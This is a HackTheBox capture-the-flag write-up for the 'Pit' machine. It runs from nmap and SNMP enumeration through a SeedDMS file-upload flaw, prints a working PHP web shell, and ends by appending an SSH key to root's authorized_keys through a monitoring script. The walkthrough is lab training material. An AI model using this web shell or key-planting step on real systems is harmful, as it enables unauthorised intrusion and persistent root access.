HackTheBox - Pit

Morten Hansen • January 30, 2022

PIT

IP: 10.10.10.241
Nmap

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
80/tcp   open  http            nginx 1.14.1
http-server-header: nginx/1.14.1
090/tcp open  ssl/zeus-admin?

PORT    STATE         SERVICE
161/udp open|filtered snmp

Snmp på port 161: snmpwalk -c public -v1 10.10.10.241 1 -On

Check certificate at http://10.10.10.241:9090 and it shows the hostname is dms-pit.htb. Add 10.10.10.241 dms-pit.htbto /etc/hosts.

Enumerate and find username michelle. Also find path /var/www/html/seeddms51x/seeddms. Try dms-pit.htb/var/www/html/seeddms51x/seeddms and we find a log in site. Log in with username and password michelle. Then research and find exploit within seeddms. https://packetstormsecurity.com/files/153383/SeedDMS-Remote-Command-Execution.html

Upload file with php-backdoor:

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

Step 3: After uploading the file check the document id corresponding to the document.
Step 4: http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=ls -laR ../../.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

Check conf file in webshell. File is full of blank spaces. Check the source-code and find password ied^ieY6xoquu.

Log in at 10.10.10.241:9090 with username michelle and password found earlier. At the website there is a terminal. It is possible to insert SSH-keys in order to ssh in from our terminal.

ROOT find /usr/bin/monitorfrom the smnp-walk. The file has +x as permissions, so type getfacl to show permission.

#!/bin/bash

for script in /usr/local/monitoring/check*sh
do
    /bin/bash $script
done

Tells us the monitor is runing scripts starting with check and ending with sh. We need it to run script like ex. check1234shand then run smnpwalk. The output will show in terminal.

echo "echo PUB-key >> /root/.ssh/authorized_keys" > /usr/local/monitoring/checkscript.sh

Because of PAM-restrictions we can't read files. Try to append and it workes. Append our public ssh-key to /root/.ssh/authorized_keys and we are able to ssh in as root.